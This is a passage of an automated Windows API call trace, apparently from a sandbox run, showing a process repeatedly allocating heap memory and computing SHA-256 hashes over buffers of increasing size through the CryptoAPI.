	[0191.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264c48
	[0191.286] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264c48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264c48, pdwDataLen=0x1283b0) returned 1
	[0191.286] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.286] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.286] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.287] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.287] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0191.287] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264c70
	[0191.287] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264c70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264c70, pdwDataLen=0x1283b0) returned 1
	[0191.287] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.287] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.287] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.287] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.287] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0191.287] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.287] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264c98
	[0191.287] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264c98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264c98, pdwDataLen=0x1283b0) returned 1
	[0191.287] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.287] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.287] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.288] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.288] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0191.288] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.288] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264cc0
	[0191.288] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264cc0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264cc0, pdwDataLen=0x1283b0) returned 1
	[0191.288] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.288] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.288] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.288] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.289] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0191.289] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264ce8
	[0191.289] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264ce8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264ce8, pdwDataLen=0x1283b0) returned 1
	[0191.289] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.289] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.289] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.289] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.289] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0191.289] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.289] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264d10
	[0191.289] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264d10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264d10, pdwDataLen=0x1283b0) returned 1
	[0191.289] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.289] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.289] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.290] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.290] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0191.290] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264d38
	[0191.290] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264d38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264d38, pdwDataLen=0x1283b0) returned 1
	[0191.290] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.290] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.290] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.290] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.290] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0191.290] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264d60
	[0191.290] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264d60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264d60, pdwDataLen=0x1283b0) returned 1
	[0191.290] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.290] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.290] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.291] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.291] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0191.291] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264d88
	[0191.291] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264d88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264d88, pdwDataLen=0x1283b0) returned 1
	[0191.291] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.291] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.291] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.291] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.291] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0191.291] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.291] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264db0
	[0191.291] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264db0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264db0, pdwDataLen=0x1283b0) returned 1
	[0191.291] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.291] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.291] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.292] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.292] CryptHashData (hHash=0x22b6940, pbData=0x2690048, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0191.292] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264dd8
	[0191.292] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264dd8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264dd8, pdwDataLen=0x1283b0) returned 1
	[0191.292] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.292] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.292] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.292] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.292] CryptHashData (hHash=0x22b6900, pbData=0x2690048, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0191.292] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264e00
	[0191.292] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264e00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264e00, pdwDataLen=0x1283b0) returned 1
	[0191.292] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.292] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.292] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2690048) returned 1
	[0191.292] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x2752bd0
	[0191.293] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.294] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.294] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0191.294] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.294] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264e28
	[0191.294] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264e28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264e28, pdwDataLen=0x1283b0) returned 1
	[0191.294] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.294] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.294] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.294] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.294] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0191.294] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.294] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264e50
	[0191.294] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264e50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264e50, pdwDataLen=0x1283b0) returned 1
	[0191.294] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.294] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.294] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.295] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.295] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0191.295] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264e78
	[0191.295] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x264e78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264e78, pdwDataLen=0x1283b0) returned 1
	[0191.295] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.295] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.295] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.295] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.295] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0191.295] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.295] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x264ea0
	[0191.295] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x264ea0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x264ea0, pdwDataLen=0x1283b0) returned 1
	[0191.295] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.295] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.295] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.296] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.296] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0191.296] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d20
	[0191.296] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2310d20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2310d20, pdwDataLen=0x1283b0) returned 1
	[0191.296] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.296] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.296] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.296] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.296] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0191.296] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.296] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310d48
	[0191.296] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2310d48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2310d48, pdwDataLen=0x1283b0) returned 1
	[0191.296] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.296] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.297] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.297] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.297] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0191.297] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.297] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310ca8
	[0191.297] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2310ca8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2310ca8, pdwDataLen=0x1283b0) returned 1
	[0191.297] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.297] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.297] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.297] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.297] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0191.297] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.297] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2310cf8
	[0191.298] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2310cf8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2310cf8, pdwDataLen=0x1283b0) returned 1
	[0191.298] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.298] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.298] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.298] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.298] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0191.298] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.298] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x272f5f8
	[0191.298] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x272f5f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x272f5f8, pdwDataLen=0x1283b0) returned 1
	[0191.298] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.298] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.298] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.299] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.299] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0191.299] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.299] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300000
	[0191.299] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300000, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300000, pdwDataLen=0x1283b0) returned 1
	[0191.299] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.299] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.299] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.299] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.299] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0191.315] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.315] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300028
	[0191.315] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300028, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300028, pdwDataLen=0x1283b0) returned 1
	[0191.315] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.315] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.315] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.316] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.316] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0191.316] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.316] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300050
	[0191.316] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2300050, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300050, pdwDataLen=0x1283b0) returned 1
	[0191.316] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.316] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.316] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.316] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.316] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0191.316] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.316] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2300078
	[0191.316] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2300078, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2300078, pdwDataLen=0x1283b0) returned 1
	[0191.316] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.316] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.316] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.317] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.317] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0191.317] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.317] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23000a0
